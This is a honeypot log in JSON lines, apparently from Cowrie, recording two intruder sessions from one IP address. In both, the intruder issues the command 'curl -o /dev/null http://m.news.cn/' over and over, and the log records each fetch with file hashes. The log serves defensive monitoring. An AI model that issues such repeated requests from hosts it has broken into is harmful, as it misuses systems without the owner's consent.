{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.832749Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.835563Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.839030Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.842781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.844413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.862914Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.863921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.884271Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.885992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.889215Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.909405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.911073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.927541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.928792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.951175Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.961441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.962726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.974980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.976327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.991142Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.013963Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.015616Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.022204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.023681Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.069263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.070689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.080141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.081700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.105325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.126075Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.127441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.132858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.134305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.188452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.189949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.193239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.194309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.237375Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.239029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.243318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.244568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.247943Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.281702Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.283136Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.286654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.287716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.308902Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.321933Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.323268Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.325592Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.326758Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.364166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.365387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.368991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.370513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.380954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.389349Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.404012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.406037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.410541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.411934Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.453245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.454811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.458819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.460208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.491552Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.497566Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.502582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.504019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.506592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.508240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.539995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.541268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.546298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.547724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.580915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.582229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.590493Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.591738Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.599553Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.602531Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.643031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.665744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.667433Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.674650Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.676021Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.677132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.680018Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.690934Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.723174Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.747640Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.749037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.754024Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.755232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.801248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.802701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.807693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
